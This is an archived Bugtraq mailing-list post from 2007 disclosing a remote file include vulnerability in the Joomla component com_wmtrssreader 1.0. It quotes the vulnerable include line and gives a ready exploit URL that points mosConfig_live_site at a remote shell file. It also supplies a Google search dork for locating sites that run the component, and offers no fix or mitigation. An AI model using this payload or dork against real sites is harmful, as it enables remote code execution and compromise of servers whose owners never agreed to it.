Home page logo
/

bugtraq logo Bugtraq mailing list archives

wmtrssreader joomla component 1.0 Remote File Include Vulnerability
From: cyber-crime () sibersavascilar com
Date: 10 Oct 2007 06:47:12 -0000

#########################################################################################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

 Component       : com_wmtrssreader version 1.0
 Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
 Dicovered by    : Cyber-Crime
 Contact         : cyber-crime () hotmail com
 Orginal         : http://www.sibersavascilar.com/category/security

==================================================================================================================================

# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php


include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );


# Exploit

 
http://localhost/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?


# google dork

 inurl:com_wmtrssreader

==================================================================================================================================

# Greetz :  www.sibersavascilar.com  www.sibersavascilar.net www.sibersavascilar.org


==================================================================================================================================

#########################################################################################################


  By Date           By Thread  

Current thread:
  • wmtrssreader joomla component 1.0 Remote File Include Vulnerability cyber-crime (Oct 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]